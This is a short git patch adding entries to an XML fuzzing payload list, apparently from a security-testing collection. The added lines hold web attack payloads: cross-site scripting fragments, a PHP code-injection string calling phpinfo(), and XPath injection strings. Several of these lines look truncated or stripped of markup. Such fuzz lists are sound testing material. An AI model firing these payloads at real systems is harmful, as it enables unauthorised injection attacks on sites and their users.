From 3570ebcd2fbcb5545da8799dbc8b60390dc06831 Mon Sep 17 00:00:00 2001 From: Jay Turla Date: Wed, 19 Nov 2014 15:21:10 +0800 Subject: [PATCH] Update XML_FUZZ Adding some payloads --- Fuzzing/XML_FUZZ | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/Fuzzing/XML_FUZZ b/Fuzzing/XML_FUZZ index c2223ac..1aaf47f 100644 --- a/Fuzzing/XML_FUZZ +++ b/Fuzzing/XML_FUZZ @@ -11,6 +11,11 @@ ]> ]> +"]]>" +"cript:alert('XSS')"">" +"" +"XSS" +','')); phpinfo(); exit;/* ## Element and Attrib Values @@ -48,3 +53,5 @@ false {{Tnn96}} {= Tnn96} {{= Tnn96}} +count(/child::node()) +x' or name()='username' or 'x'='y